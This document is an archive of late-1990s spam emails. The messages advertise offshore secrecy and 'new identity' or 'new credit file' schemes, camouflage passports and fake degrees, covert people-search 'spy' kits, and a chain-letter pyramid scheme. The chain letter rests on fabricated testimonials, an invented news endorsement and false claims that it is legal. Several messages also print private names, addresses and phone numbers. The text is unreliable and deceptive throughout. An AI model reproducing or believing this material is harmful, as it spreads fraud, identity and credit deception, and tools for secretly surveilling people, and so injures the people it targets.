*INCORPORATE OFFSHORE.... COMPLETELY PRIVATE.
*OFF SHORE INVESTORS ANXIOUS!!
*UP TO 100% FINANCING ON RESIDENTIAL & COMMERCIAL PROPERTIES
*BILL CONSOLIDATION NO MATTER WHAT YOUR CREDIT IS LIKE
*LINES OF CREDIT UP TO $15,000 REGARDLESS OF YOUR CREDIT
*SECRET MONEY...SECRECY IS A THRIVING INDUSTRY
*LEARN HOW THE RICH AND POLITICIANS GET EVEN RICHER USING

The Briorex report is a complete financial package for those with good or bad credit.
It's for all those who know a little about off shore opportunities but don't know how to get started. This is what you get when 
you order:

12 credit card secrets your bank doesn't want you to know!

Learn how to create a new identity legally!

BOTH VISA AND MASTERCARD
* NO SAVINGS ACCOUNT *BAD CREDIT OK**NO SECURITY DEPOSIT*STUDENTS*WELFARE*OK**NO MEMBERSHIP 
FEES *BANKRUPTCY OK*
We guarantee that you will be approved for both VISA and MASTERCARD. You can receive both Credit Cards
within 10 Business Days, via Express Approval and Card Issue.

PLUS...GUARANTEED $10,000 INSTANT PRE-APPROVED CREDIT WITH NO CREDIT
CHECK, NO SECURITY DEPOSIT, NO ONE REFUSED!

We absolutely guarantee you'll receive 3 to 5 new credit cards with credit lines totaling $10,000! You'll receive our exclusive 
list of 5 "secret" sources that you can obtain instant credit from. With our program you will receive a pre-approved $2500 
credit card application. THERE IS ABSOLUTELY NO CREDIT CHECK AND NO SECURITY DEPOSIT. NO ONE will be 
turned down. If you don't get a credit card we will refund your money!!!

ERASE BAD CREDIT!

ESTABLISH A-1 CREDIT IN LESS THAN 6 MONTHS!

100% legal, and 100% bulletproof protection against liens,
levies, judgements, and divorce.
International credit cards 100% ACCEPTANCE GUARANTEED!
A Social Security Number Is Not Required,
And There Are No Credit Checks Or Income
Restrictions.
Only Proof Of Identification Is Required.
Our International Bank Offers VISA GOLD(r), VISA
CLASSIC(r), And MASTERCARD(r) Credit Cards.
Could you use a Bank Account, without the need
for a banking reference to open the account ?
You can open the account Instantly from an On-line
application form.
No banking references or notarization needed

Private Bank accounts without banking references or demanding of notarization.

Instant account in 10 seconds for immediate use.

Learn how to get copies of your:
3 Credit Reports
FBI records disclosure form
Mailing list removal letter
Motor Vehicle records
Social Security Records
Medical Records
Education Records
Employment Records


Find out how anyone can have a new credit file INSTANTLY OVERNIGHT!  This is the very same CREDIT SECRETS that 
CELEBRITIES use! It works with Bankruptcies, FBI (DUI) and Judgments! It's LEGAL and best of all, the process is FREE! 
If you or someone you know has had credit problems in the past - no matter how bad, this information is vital. These are the 
SECRETS that the Credit Bureaus DON'T WANT REVEALED!
Learn how to use the Credit Bureaus to get a TOTALLY NEW-CLEAN credit file.
ADD AAA CREDIT within WEEKS to your new or existing file that any Bank or Lender
would drool over! (This secret alone is worth the price!)
Get credit cards, buy a car, buy a house!
Learn the WORDS THAT WILL STOP COLLECTION AGENCIES COLD!  Legal ways to
get the bill collectors off your backs.
Discover how to obtain an $800 loan by mail...interest free
Raise $20,000 or more in 24 hours
Learn your CONSUMER RIGHTS and Consumer Credit Reporting Agencies
Get any credit card you want.  Win the credit card game.
How to get a Visa/MasterCard with no credit check
Learn the starting truth about how credit decisions are made.   Learn the secrets on obtaining credit cards, bank loans, and 
mortgages.
How to obtain a Free Copy of your credit report from the Major Bureaus.
Understand how credit information is placed on your report...and how FREQUENTLY errors occur.
Learn how to include your side of the story in your credit report so that your potential creditors understand how and why 
blemishes appear on your report.
A simple way to turn an initial $300 investment into multiple, desirable credit references that will have credit managers 
banging down your door trying to loan you money.


Learn about a complete range of offshore banking facilities:
No Id/no reference electronically managed accounts,
anonymous numbered accounts, 
tax-free investment and multi-currency coded accounts, 
debit and credit cards.
Providing knowledge, freedom, privacy,
security and alternatives: 
alternative ID cards,  
second passport programs and citizenship,  
camouflage passports, 
press passes, 
international driver permits,
university degrees,  
nobility titles, 
and more...
Offshore Retirement Plans
Commercial Asset Protection
Estate Planning
Tax Planning primary goal can have a number of component
objectives, including the ability to:

Minimize risk of loss
Create artificial poverty
Establish asset anonymity
Prevent future lawsuits
Create incentives for dispute settlement
Make work for any opponent
Increase litigation odds in your favor
Protect your economic and social lifestyle
Maintain planning flexibility
Preserve financial security
Secure privacy
Keep peace of mind
2nd Passport Programs & Citizenship
Instant Citizenship
Camouflage Passports
Alternative ID Cards
International Driver Permits
Genuine Press Passes
University Degrees



We could easily ask $100.00 or more for this complete valuable information source book and be flooded with orders. 
However, we want to keep our prices affordable for you. So we are offering this complete valuable credit card source book 
including your FREE $50.00 Off Shore Report for only $25.00. That's it.

If you need more information or won't to order just go to the email address below:

magical203@hotmail.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bv111@hotmail.com
Date: Sun, 4 Oct 1998 21:14:17 -0700 (PDT)
To: 123458@qqeioweisssiiie.com
Subject: SPY FILE!!!....GET THE DIRT ON ANYONE!!!!
Message-ID: <199234233019.GAA08423@qqeioweisssiiie.com>
MIME-Version: 1.0
Content-Type: text/plain


<HTML><PRE><BODY BGCOLOR="#000000"><FONT COLOR="#00FFFF" SIZE=3>


THIS IS A ONE TIME MAILING.  IF YOU ARE NOT INTERESTED, SIMPLY DELETE!


 
Massive Internet SNOOP File!
 
What would you give to be able to find:
Agencies - Obtain your FBI file! Check out the latest government scandal! 
Performing background checks - The wealth of information in this list is scary and could be banned!
Most wanted lists - Say, was that your new neighbor?! 
People Finders - Find almost anybody anywhere in the US! 
We have all heard about the vast amounts of information that can be found on the internet and to some extent we have all discovered how useful it can be. However, did you know that you can find out practically anything about a person and/or business on the Internet? Armed with this professional but, easy to use list, you can use the same sources that more and more private investigators are using to track, locate, background check or screen almost anyone anywhere.
This is not one of those lists that's thrown together with a bunch of outdated links. These are the best links for your investigative needs! You have a right to know! 
Search For People - Find Almost Anyone- Find people who have relocated -- Vital statistics -- Find people who have changed their name, email address or phone -- Resources for finding adoptees and birth parents -- Social security lookups - - Military databases -- Find people using their phone number -- Create a map showing directions right to a person's door -Tap Into Investigative Sources- Bank account information -- Driver's records -- Lawsuits -- Employment sceening -- Criminal records -- Asset identification -- Your FBI file -- Investigative information -- Secrets of the past -- Tax liens -- Anything on anybody -- Listen in on the police radios (scanner) -Search Various Government Resources - State by State information -- Government databases -- CIA information -- Legal databases - - Court documents -Visit Numerous Information Sources- Send anonymous email - - Illegal drug archives - - Track anyone's newsgroup postings -- Surf anonymously on the net -- FBI's most wanted -- Check the Internet's better business bureau -- Criminal databases -- Sources for underground books & information -And Much More!
LOOKING FOR SOMEONE!!!

THIS IS IT !!!

THE ULTIMATE IN SPY SOURCE INVESTIGATIVE DISKS LOOK NO FURTHER CAUSE THIS ONE DOES IT ALL!!!

NEED INFORMATION ABOUT POTENTIAL EMPLOYEE'S?

HOW ABOUT INFO ABOUT YOUR BOSS? OR FUTURE EMPLOYERS?

MAYBE YOU NEED TO KNOW MORE ABOUT THE PERSON YOU'RE DATING!

NEED TO SEE YOUR CREDIT FILE? OR THAT OF SOMEONE ELSE?

WHATEVER YOU NEED TO KNOW, THIS DISC WILL HELP YOU FIND IT OUT!!

Now The Sources Used By Private Investigators Can Be At Your Fingertips! A Must Have For Those Who NEED To Be Able To Find Out Practically Anything About Practically Anybody Some Free Sources And Others That Charge A Small Fee, To Track, Locate, Run a Background Check Or Screen Anyone, Anywhere. 
THIS SPY SOURCE INVESTIGATIVE DISK IS FOR USE IN BOTH WINDOWS AND DOS. AND INCLUDES A DIRECTORY OF ONLINE SOURCES! Maybe You Want To Start Your Own Private Investigative Information Services Business, Compiling & Selling Valuable Information To Prospective Clients. You'll Be Amazed At The Information Sources That Are Available On This Diskette. 


THE SPY SOURCES INCLUDE:


* Asset Identification * 
* Investigative & Intelligence Information * 
* Secrets Of Past *
* Anything About Anybody *
* Government Resources *
* State By State Information Services *
* Government DataBases *
* Genealogical *
* Skip Tracing *
* Missing Heirs Identified *
* Competitor Intelligence *
* Counter Intelligence *
* Threat Assessment *
And Much Much More!!! 

You'll Have The Option To Offer Your Own Investigative Information Services To Attorneys, Businesses, And Individuals Alike. Professionals Charge Hundreds Of Dollars For Such Invaluable Information. Now You Have These Spy Sources At Your Fingertips To Use As You Wish! These Are The Tools Private Investigators Use and Now They Can Be Yours! Some of the SPY information sources will require that you pick up the phone or a pen to get the information you want, but most of the sources are just a mouse click away! A fully functional html file is included for those with desktops and browsers that support a point and click interface!
Learn EVERYTHING about your friends, neighbors, enemies, employees, even your boss, even yourself! Unlock incredible hidden sites-and more! 
Over 300 giant resources to look up people 
* credit 
* social security 
* current or past employment 
* mail order purchases 
* addresses 
* phone numbers... PLUS 
** Track down an old debt, or anyone else that has done you wrong! 
** Locate an old friend, a lost loved one--find e-mail, telephone or address information on anyone! 
** Even look up *unlisted* phone numbers! 
** Investigate your family history! 
** Check birth, death, adoption or social security records of Army, Navy, Air Force, or Marine Corps. 
** Get juicy tid-bits about your co-workers! 
** Check out a new boyfriend or girlfriend--Before it's too late! 
** Find trial transcripts and court orders! 
** Check credit, driving, and criminal records! 
No one will ever know you were checking up on them! 
The internet is a powerful megasource of information, if you know where to look. I will show you how to find out nearly ANYTHING on ANYBODY! You will be amazed to find out what personal information can find out about YOU! Check your credit report and see for yourself! 
Best of all, this information costs only $8.00. Obviously, it's worth a lot more. Don't miss out, as this opportunity won't be around for long!
Free Delivery by E-Mail. Disk sent for additional $2.00

Please send concealed cash, check, or money order to:

P. Calderone
8 Melody Lane
Effort,  PA  18330

P.S.  PLEASE INCLUDE E-MAIL 
ADDRESS FOR E-MAIL DELIVERY.




























THANK YOU FOR YOUR TIME.





























BYE.


</FONT><FONT  COLOR="#000000" SIZE=3>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: badibe@uni-paderborn.de
Date: Mon, 5 Oct 1998 00:18:38 -0700 (PDT)
To: You@yourplace.com
Subject: YOUR  CLASSIFIED - AD / 333  NEWSPAPERS  !!!!
Message-ID: <199810050718.AAA06358@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



YOUR AD IN 333 NEWSPAPERS !!!!!!!!!!
***********************************************

         Seven years ago, I learned how to place my Classified Ad in
several hundred newspapers, with just one telephone call.  And, my
cost was $0.51 per newspaper.  The total circulation was well over
1.5 Million.  I could reach just about any market, anywhere in this
country.  Since then, my small mail-order company has exploded.
And, I use this same time tested and true method week after week.

         I would like to share this powerful information and show you
how to save hundreds, even thousands of dollars on advertising that
works.  The average cost of a classified ad in a newspaper is about
$15.00 to $20.00 dollars.  Multiply that by 333 and your total cost is
well over $6,000.00 Dollars.  By using our amazing method, your
total cost is only $170.00.  Not to mention the time and money you
save by placing one call, instead of 333 long distance calls.

          You can limit your promotion to a Single State or place your
ad in Several States around the country, all with just one phone call.
You can reach One Million Readers on the East-Cost today and a
Million on the West-Coast tomorrow.  It's that simple  !!!!

            Your cost for this priceless information, is only $19.00 !!!  
You will make that back on your first promotion.  WE are so confident that
this type of advertising will boost your profits, we will guarantee your
satisfaction with our Money Back Guarantee !!  So, you have nothing
to lose.  Now, order our amazing classified ad method today !!!!!! 


                                PRINT ORDER FORM
Ship To:                    **************************
*********
NAME____________________________________________

ADDRESS________________________________________

CITY______________________________________________

STATE__________________    ZIP_____________________

E-MAIL__________________________________

Don't Delay,   ORDER YOUR COMPLETE MEDIA KIT TODAY !!!!!!!

**********************************************************************
Mail Payment  $19.00  CASH,  money order,  or check  TO:
********************
 
                                  INFORMATION, Ltd.
                                  P. O. Box  515019 
                                  St. Louis, MO 63151-5019  
                                  U.S.A.

WE will ship your complete KIT directly to you !!!!
 

**************************************************************
OPTIONAL / OVERNIGHT SHIPPING - ADD $15.00
**************************************************************
                          
Thank you for your kind attention, and have a nice day !!!


+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


Find Out Anything About Anyone On The Net  !!!
=========================================

YOU can easily learn how to investigate and learn EVERYTHING 
about your employees, neighbors, friends, enemies, and or
anyone else  !!!


It is absolutely amazing !!!
YOU Must Get This Extraordinary Package today.........


   +  YOU can track down an old friend or a lost love,
     and, just for fun, investigate your family history.

   +  YOU can screen prospective employees criminal records,
     look at their driving, or credit history.

   +  YOU can verify test results from drug testing and even
     look into your children's friends history for any type 
     of record.

   +  YOU can TRACK down and locate an old debtor who is
     hiding from you and see if he/she is hiding any assets.

   +  YOU can look up "unlisted telephone numbers."  Locate
     social security, birth, adoption or death records.
     Check Army, Navy, Marine Corps, or Air Force service
     file records.  YOU will simply be amazed to learn what
     sensitive and important information other people and
     enemies can discover about YOU !!!!!

YOU Can Find Out Anything About Anyone On The Net !!!
Do background checks on people and charge for it, as
you start your own investigative services.
Stop guessing about the LAW !!!
Look up laws and do much more, direct from famous law libraries.
Get this easy to use  KIT  right away, and then,
YOU can become a private investigator.

ORDER TODAY !!!!!


Send $18.00 cash (wrapped in two pieces of paper),
money order, or check to:

                    INFORMATION, Ltd.
                    P. O. Box  515019
                    St. Louis, MO  63151-5019  USA

The Complete Package Will Be Immediately Shipped
Prepaid Directly to You With Everything You Will Need
In Your Kit to Get Started Right Away !!

THANK YOU for your kind attention, and have a nice day !!!!


       YOU MAY ORDER BOTH PACKAGE KITS FOR ONLY $33.00


++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Admin
Internet Services
This message is not intended for residents in the 
State of Washington, screening of addresses has been done
to the best of our technical ability.
If you are a Washington resident or otherwise wish to be
removed from this list, go to global remove site if you want
your address removed from future mailing. 
http://209.84.246.162/remove.htm
 
This Global Communication has been sent to you by:
PAVILION INTERNATIONAL SERVICES
Offices:  London, Paris, Berlin, Hong Kong


















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED MONDAY OCTOBER 5 1998 <stuffed@stuffed.net>
Date: Mon, 5 Oct 1998 01:20:47 -0700 (PDT)
To: (THE ULTIMATE DAILY SEXY SITE!)
Subject:       ---->   http://stuffed.net/home/   <----
Message-ID: <19981005071000.8168.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


STUFFED HAS EVOLVED OVER THE LAST COUPLE OF MONTH, THANKS TO
ALL YOUR FEEDBACK.  NOW WE HAVE BOUGHT IN THOUSANDS MORE HI-
RES  PHOTOS FROM  TOP SEX  PHOTOGRAPHERS,  WE SCOUR  THE WEB
EACH DAY TO FIND LINKS TO SITES WITH  100S MORE FREE IMAGES,
AND THERE'S SO MUCH MORE,  SUCH AS THE FIVE EXTRA BONUS PICS
YOU GET  EVERY DAY NOW,  THAT YOU WON'T FIND  ON THE STUFFED
WEB SITE, THEY ARE EXCLUSIVE TO OUR SUBSCRIBERS! AND THERE'S
SO MUCH MORE TO COME, SO KEEP COMING BACK FOR MORE EACH DAY!

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/home/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wilfrido1@aol.com
Date: Sun, 6 Dec 1998 15:15:56 -0800 (PST)
To: wilfrido1@aol.com
Subject: *** Holiday Cash ***
Message-ID: <199812060100.BAA29765@fd1.fildirect.fr>
MIME-Version: 1.0
Content-Type: text/plain


Date: December 5, 1998


THIS IS IT FOLKS!!

This is THE LETTER you've been READING about
in the NEWS lately.

Due to the popularity of this letter on the
Internet, a major nightly news program recently
devoted an entire show to the investigation of
the program described below, to see if it really
can make people money.  If you saw it, you know
that their conclusion was that while most people 
did not make the $55,000, as discussed in the plan,
EVERYONE who followed the instructions was able to 
make 100 to 160 times their money at the VERY LEAST.

The show also investigated whether or not the
program was legal.  Their findings proved once and
for all that there are absolutely no laws prohibiting
the participation in the program.  "This is one of
the most exciting opportunities with the MOST income
potential on the internet today!"  - - 48 Hours.

Hi, my name is Susan.  After I saw this letter aired
on the news program, I decided to get some of my
skeptical questions answered.

Question #1 - Does it really work?  Until I try it,
I can only go on the testimony of people I don't know,
so I will only know if I try it.  I've never done
this type of thing, but I decided it was time to try
something.  If I keep doing what I am doing I'll keep
getting what I've got.  Besides, people 70 years old
have been surveyed and they have consistently said
that the 2 regrets they have had in their lives were
that:

	1)  They wish they had spent more time with
	     their families. 

	and
	
	2)  They wish they had taken more chances

Upon hearing this again, and hearing what the media
said about it, I decided that at age 42, I was going to
take a small chance and see what would come of it.

Question #2 - Is it legal?  - Yes,  (Refer to title 18, 
Section 1302 & 1342 of the U.S. Postal and Lottery
Laws)  This opportunity isn't much of a risk and could
turn out to actually be a bit of fun.

Bottom Line;
The risk is only $20 and time on the Internet.
The following is a copy of the letter that the media
was referring to:

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

This is a LEGAL, MONEYMAKING PHENOMENON.
PRINT this letter, READ the directions, THEN READ IT
AGAIN ! ! !

You are about to embark on the most profitable and
unique program you may ever see!  Many times over,
it has demonstrated and proven its ability to
generate large amounts of cash!  This program is
showing fantastic appeal with a huge and ever-growing
on-line population desirous of additional income.

This ia a legitimate, LEGAL, moneymaking opportunity.
It does not require you to come in personal contact
with people, do any hard work, and best of all, you
never have to leave the house, except to get the mail
and go to the bank!

This truly is that lucky break you've been waiting
for!  Simply follow the easy instructions in this
letter, and your financial dreams can come true!
When followed correctly, this electronic, multi-
level marketing program WORKS!

Thousands of people have used this program to:
	-  Raise capital to start their own businesses
	-  Pay off debts
	-  Buy homes, cars, etc.,
	-  Even retire!

This is your chance, Don't pass it up!

------------------------------------------------------
OVERVIEW OF THIS EXTRAORDINARY

ELECTRONIC MULTI-LEVEL MARKETING PROGRAM
------------------------------------------------------

Basically, this is what we do:

We send thousands of people a product for which they
paid us $5.00 US.  The product costs next to nothing
to produce.  We then e-mail the product back to them.

As with all multi-level businesses, we build our business by
recruiting new partners and selling our products.
Every state in the U.S. allows you to recruit new
multi-level business online (via your computer).

The products in this program are a series of four
business and financial reports costing $5.00 each.
Each order you receive is to include:

	*  $5.00 cash United States Currency

	*  The name and number of the report they are
	    ordering
	
	*  The e-mail address where you will e-mail 
	    them the report they ordered.

To fill each order, you simply e-mail the product to 
the buyer.  THAT'S IT!  The $5.00 is yours!  This is
the EASIEST electronic multi-level marketing business
anywhere!

FOLLOW THE INSTRUCTIONS TO THE LETTER AND
BE PREPARED TO REAP THE STAGGERING BENEFITS!

+++++++++  I  N  S  T  R  U  C  T  I  O  N  S  ++++++++

This is what you MUST do:

1.  Order all 4 reports shown on the list below
     (you can't sell them if you don't order them).

*  For each report, send $5.00 CASH, the NAME &
   NUMBER OF THE RPORT YOU ARE ORDERING, YOUR E-MAIL
   ADDRESS, and YOUR RETURN POSTAL ADDRESS  (in case of
   a problem)  to the person whose name appears on the
   list next to the report.

*  When you place your order, make sure you order 
   each of the four reports.  You will need all four
   reports so that you can save them on your computer
   and resell them.

*  Within  a  few days you are to receive, via e-mail,
   each of the four reports.  Save them on your computer
   so they will be accessible for you to send to the
   thousands of people who will order them from you.

2.  IMPORTANT -- DO NOT alter the names of the people
     who are listed next to each report, or their sequence
     on the list, in any way other than as instructed
     below in steps "a" through "d".If you do, you will lose out
     on the majority of your profits.  Once you understand
     the way this works, you'll also see how it doesn't
     work if you change it.  Remember that this method has
     been tested, and if you alter it, it will not work.

a.  Look below for the listing of available reports.

b.  After you've ordered the four reports, replace 
     the name and address under REPORT #1 with your name
     and address, moving the one that was there down to
     REPORT #2.

c.  Move the name and address that was under REPORT
     #2 down to REPORT #3.

d.  Move the name and address that was under REPORT
     #3 down to REPORT #4.

e.  The name and address that was under REPORT #4
     is removed from the list and has NO DOUBT collected
     large sums of cash!

     Please make sure you copy everyone's name and address
     ACCURATELY! ! ! (Please be sure to specify the country to
     which payment is to be made.  For instance: U.S.A. if      mailing from another country.) 

3.  Take this entire letter, including the modified
     list of names, and save it to your computer.  Make
     NO changes to the instruction portion of this letter.

4.  Now you're ready to start an advertising campaign
     on the WORLDWIDE WEB!  Advertising on the WEB can be 
     very, very inexpensive, and there are HUNDREDS of
     FREE places to advertise.  Another avenue, which you
     could use for advertising, is e-mail lists.  You can
     buy these lists for as little as $20/2,000 addresses or you
     can pay someone to take care of it for you.  BE SURE
     TO START YOUR AD CAMPAIGN IMMEDIATELY!

5.  For every $5.00 you receive, all you must do is
     e-mail them the report they ordered.  THAT'S IT!
     ALWAYS PROVIDE SAME-DAY SERVICE ON ALL
     ORDERS!  This will help guarantee that the e-mail 
     THEY send out, with YOUR name and address on it, 
     will be prompt because they can't advertise until they 
     receive the report!  To grow fast be prompt and courteous.

---------------------------------------------------------
AVAILABLE REPORTS
*Order Each REPORT by NUMBER and NAME*

Notes:
-  ALWAYS SEND $5 CASH FOR EACH REPORT
-  ALWAYS SEND YOUR ORDER VIA THE QUICKEST DELIVERY
-  Make sure the cash is concealed by wrapping it
    in at least two sheets of paper
-  On one of those sheets of paper, include:  (a) the
   number & name of the report you are ordering,  (b)
   your e-mail address, and (c) your postal address.

_____________________________________________________

REPORT #1 "HOW TO MAKE $250,000 THROUGH MULTI-LEVEL
SALES"
ORDER REPORT #1 FROM:

		P. Green
		General Delivery
		Port Tobacco,   MD  20677
		U.S.A.
_____________________________________________________

REPORT #2  "MAJOR CORPORATIONS AND MULTI-LEVEL SALES"
ORDER REPORT #2 FROM:

		Inter-Line Systems
		PO Box 175
		Milford,  NJ  08848
______________________________________________________

REPORT #3  "SOURCES FOR THE BEST MAILING LISTS"
ORDER REPORT #3 FROM:

		Galactic Whispers
		PO Box 291
		Pittstown,  NJ  08867
______________________________________________________

REPORT #4  "EVALUATING MULTI-LEVEL SALES PLANS"
ORDER REPORT #4 FROM:

		DEM
		3 Tallyho Lane
		Bow,  NH 03304
______________________________________________________

------------------------------------------------------
HERE'S HOW THIS AMAZING PLAN WILL MAKE YOU $MONEY$
------------------------------------------------------

Let's say you decide to start small just to see how
well it works.  Assume your goal is to get 10 people
to participate on your first level.  (Placing a lot
of FREE ads on the internet will EASILY get a larger
response.)  Also assume that everyone else in YOUR
ORGANIZATION gets  ONLY 10 downline members.  Follow
this example to achieve the STAGGERING results below.

1st level - - your 10 members with $5 .. . . . . .$50

2nd level - - 10 members from those 10 
($5 x 100) . . . . . . . . . . . . . . . . . . . .$500

3rd level - - 10 members from those 100
($5 x 1,000) . . . . . . . . . . . . . . . . . . .$5,000

4th level - - 10 members from those 1,000
($5 x 10,000) . . . . . . . . . . . . . . . . . . $50,000

THIS TOTALS  - - - - - - - - - - - - - - -  - - - $55,550

Remember friends, this assumes that the prople who
participate only recruit 10 people each.  Think for
a moment what would happen if they got 20 people to
participate!  Lots of people get 100s of participants!
THINK ABOUT IT!

Your cost to participate in this is practically
nothing (surely you can afford $20).  You obviously
already have an internet connection and e-mail is
FREE! ! !  REPORT #3 shows you the most productive
methods for bulk e-mailing and purchasing e-mail
lists.  Some list & bulk e-mail vendors even work
on trade!

About 50,000 new people get online every month

****TIPS FOR SUCCESS****

*  TREAT THIS AS YOUR BUSINESS!  BE PROMPT,
    professional, and follow the directions accurately.

*  Send for the four reports IMMEDIATELY so you will
   have them when the orders start coming in because:
   When you receive a $5 order, you MUST send out the
   requested product/report to comply with the U.S.
   Postal & Lottery Laws, Title 18, Sections 1302 and
   1341 or Title 18, Section 3005 in the U.S. Code
   also Code of Federal Regs.  vol..  16, Sections 255
   and 436, which state that "a product or service
   must be exhanged for money received."

*  ALWAYS PROVIDE SAME-DAY SERVICE ON THE ORDERS YOU
   RECEIVE.

*  Be patient and persistent with this program.  If
   you follow the instructions exactly, the results
   WILL undoubtedly be SUCCESSFUL!

*  ABOVE ALL, HAVE FAITH IN YOURSELF AND KNOW YOU
   WILL SUCCEED!

     ***********YOUR SUCCESS GUIDELINE*************

Follow these guildelines to help assure your success:

If you don't receive 10 to 20 orders for REPORT #1
within two weeks, continue advertising until you do.
Then, a couple of weeks later you should receive at
least 50 orders for REPORT #2.  If you don't,
continue advertising until you do.  Once you have
received 50 or more orders for REPORT #2, YOU CAN
RELAX,  because the system is already working for you,
and the cash can continue to roll in!

THIS IS IMPORTANT TO REMEMBER:

Every time your name is moved down on the list, you
are placed in front of a DIFFERENT report.  You can
KEEP TRACK of your PROGRESS by watching which report
people are ordering from you.  If you want to
generate more income, send another batch of e-mails
and start the whole process again!  There is no limit
to the income you will generate from this business!

Note To U.S. Paticipants:  If you need help with starting a business,
registering a business name, how income tax is
handled, etc., contact your local office of the
Small Business Administration (a Federal agency) for
free help and answers to questions.  Also, the
Internal Revenue Service offers free help via
telephone and free seminars about business taxes.

If you have any question of the legality of this
letter contact the Office of Associate Director for
Marketing Practices Federal Trade Commission Bureau
of Consumer Protection in Washington, DC.

******  T  E  S  T  I  M  O  N  I  A  L  S  *******

This program does work, but you must follow it EXACTLY!
Especially the rule of not trying to place your name
in a different position, it won't work and you'll lose
a lot of potential income.  I'm living proof that it
works.  It really is a great opportunity to make
relatively easy money, with little cost to you.  If you
do choose to participate, follow the program exactly.
Sean McLaughlin, Jackson, Ms.

The main reason for this letter is to convince you
that this system is honest, lawful, extremely
profitable, and is a way to get a large amount of
money in a short time.  I was approached several
times before I checked this out.  I joined just to
see what one could expect in return for the minimal
effort and money required.  To my astonishment, I 
received $36,470.00 in the first 19 weeks, with money
still coming in.
Phillip A. Brown, Esq.

I had received this program before.  I deleted it, but
later I wondered if I shouldn't have given it a try.
Of course, I had no idea who to contact to get another
copy, so I had to wait until I was e-mailed another
program . . . 11 months passed then it came . . . I didn't
delete this one! . . . I made more than $41,000 on the
first try!!
D. Wilburn, Muncie,  In.

This is my third time to participate in this plan.
We have quit our jobs, and will soon buy a home on
the beach and live off the interest on our money.
The only way on earth that this plan will work for
you is if you do it.  For your sake, and for your
family's sake don't pass up this golden opportunity.
Good luck and happy spendiong!
Charles Fairchild,  Spokance,  Wa.

I am nearing the $90,000 mark from this program.  I
have used several forms of advertisement.  I used
regular mail and bulk e-mail.  The regular mail that
I used was very expensive for two reasons.  I purchased
a very select list of names and the postage.  The third
time I sent e-mails out, I did so in the quantity of
1 million.  So, after 3 times participating in this
program I am almost at the $90,000 mark.  That isn't
too bad.  I hope the same success for you.
Raymond McCormick,  New Canna,  Ct.

------------------------------------------------------
You have great potential for extra earnings that is
available at your fingertips!  You have unlimited
access to wealth, but you must be willing to take
that first step!  The Media ALREADY PROVED That ! ! ! 

You could be making an obscene amount of money!  I
have given you the information, materials, and
opportunity to become financially better off.  IT IS
UP TO YOU NOW!  - THINK ABOUT IT - Your risk is only
$20.?  HOW MUCH DO YOU SPEND ON LOTTO TICKETS -
  for NO RETURN?
ORDER YOUR REPORTS TODAY
AND GET STARTED ON YOUR ROAD
TO FINANCIAL FREEDOM! ! ! :)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rikoso81@prodigy.com
Date: Mon, 5 Oct 1998 00:02:44 -0700 (PDT)
To: rikoso81@prodigy.com
Subject: Regarding- Psychic Readings
Message-ID: <199810053451FAA9809@post.daikei.co.jp>
MIME-Version: 1.0
Content-Type: text/plain


<HTML><FONT  SIZE=3 PTSIZE=10><BR>
Boone Psychic Counseling<BR>
(828)262-3487<BR>
Located in Boone,North Carolina<BR>
"PSYCHIC Readings by Melissa Stone"<BR>
<BR>
Psychic Melissa Stone is available to you for the first time publicly on <BR>
the internet. Psychic Melissa Stone is your ultimate psychic choice in <BR>
psychic counseling and guidance. Psychic Melissa Stone has joined the <BR>
ultimate psychic forces for you to obtain your lifes ultimate goals and<BR>
expectations weather business or personal, Melissa Stone is your ultimate<BR>
psychic choice.(The items listed below are just a few items the psychic<BR>
Melissa Stone will psychically guide you to your ultimate sucess and<BR>
happiness)<BR>
<BR>
A. Past Life Readings<BR>
B. Psychic Readings <BR>
C. Reunite Your Love Affair<BR>
D. Psychic Guidance To Your Career Movement <BR>
E. Dissolvement Of All Occult Activity In Your Life Or A Loved Ones <BR>
F. Be Relived Of Tension,Depression,Anxiety,Ect.<BR>
G. Employer Or Co-Worker Problems<BR>
H. Quartz Crystal Readings<BR>
I. Tarot Card Readings<BR>
<BR>
<BR>
SPECIAL TO ALL AOL SUBSCRIBERS!!!<BR>
A FREE SAMPLE PSYCHIC READING<BR>
TOTALLY FREE NO (900)#'s or Recordings <BR>
"you WILL speak to Melissa Stone"<BR>
(828)262-3487<BR>
<BR>
Psychic Melissa Stone offers many more services to you. Stop<BR>
wishing,praying,and hoping that your life will get better . Call now and let<BR>
Psychic Melissa Stone assist you in conquering all your life's obstacles and<BR>
barriers. Have your dreams fulfilled now. All contacts are held with the<BR>
strictest of your confidentiality. <BR>
(828) 262-3487 Call NOW !!!<BR>
</HTML>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: positzzzsu@yahoo.com
Date: Mon, 5 Oct 1998 03:12:01 -0700 (PDT)
To: positzzzsu@yahoo.com
Subject: 725+ Search Engines
Message-ID: <199810051009.SAA29107@public.>
MIME-Version: 1.0
Content-Type: text/plain


!!!LOWEST PRICE EVER!!!!!

REGULAR $89......ONE WEEK ONLY...$38        we9

WE WILL SUBMIT YOUR WEBSITE OR HOMEPAGE TO 725+ SEARCH ENGINES
AND PROVIDE YOU WITH A REPORT SHOWING ALL SUCCESSFUL SUBMISSIONS!!

